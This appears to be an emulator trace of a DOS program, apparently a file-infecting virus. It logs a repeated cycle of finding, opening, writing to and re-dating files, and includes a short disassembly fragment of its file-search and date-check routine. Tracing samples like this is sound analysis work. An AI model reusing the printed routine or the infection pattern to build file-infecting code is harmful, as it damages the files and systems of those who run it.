2018-12-25T12:41:39.255611364Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:39.257869709Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:39.260645891Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:39.272481902Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:39.274771008Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:39.276887723Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.282535862Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:39.286276083Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.293632046Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:39.304263433Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:39.307325646Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.318609348Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.32635289Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:39.330343174Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:39.331878741Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:39.334487072Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:39.344112201Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:39.34665577Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:39.355257685Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.366269854Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:39.369498814Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.377073898Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:39.384109749Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:39.386261815Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.397292405Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.404549912Z 64 PC: 12b38 | Write file or device (See above)
2018-12-25T12:41:39.409004575Z 66 PC: 12b76 | Move file pointer (See above)
2018-12-25T12:41:39.410575499Z 44 PC: 12b43 | Get time (See above)
2018-12-25T12:41:39.413383355Z 64 PC: 12c1e | Write file or device (See above)
2018-12-25T12:41:39.417225328Z 87 PC: 12b5f | Get or set file date and time (See above)
2018-12-25T12:41:39.418903399Z 62 PC: 12b63 | Close file (See above)
2018-12-25T12:41:39.427046148Z 67 PC: 12b8f | Get or set file attributes (See above)
2018-12-25T12:41:39.438368228Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:39.441245663Z 61 PC: 12b84 | Open file (See above)
2018-12-25T12:41:39.449542125Z 63 PC: 12ae4 | Read file or device (See above)
2018-12-25T12:41:39.457652049Z 62 PC: 12ae8 | Close file (See above)
2018-12-25T12:41:39.459971777Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:41:39.463009317Z 59 PC: 12a9f | Change current directory
2018-12-25T12:41:39.468404956Z 42 PC: 12aa5 | Get date 0x12aa5: cmp dx, 0xf03
0x12aa9: jne 0x12ab3
0x12aab: mov ah, 9
0x12aad: lea dx, word ptr [bp + 0x283]
0x12ab1: int 0x21
0x12ab3: lea dx, word ptr [bp + 0x2c4]
0x12ab7: mov ah, 0x3b
0x12ab9: int 0x21
0x12abb: mov dx, 0x80
0x12abe: call 0x12b77
0x12ac1: ret
0x12ac2: mov ah, 0x4e
0x12ac4: mov cx, 7
0x12ac7: int 0x21
0x12ac9: jb 0x12ad2
0x12acb: call 0x12ad3
0x12ace: mov ah, 0x4f
0x12ad0: jmp 0x12ac7
0x12ad2: ret
0x12ad3: mov ax, 0x3d00
2018-12-25T12:41:39.471114997Z 59 PC: 12abb | Change current directory
2018-12-25T12:41:39.473411106Z 26 PC: 12b7b | Set disk transfer address (See above)
2018-12-25T12:41:39.476668939Z 9 PC: 12a47 | Display string (String= 'Sleeping, Press a Key...')
2018-12-25T12:41:39.479323353Z 1 PC: 12a4b | Character input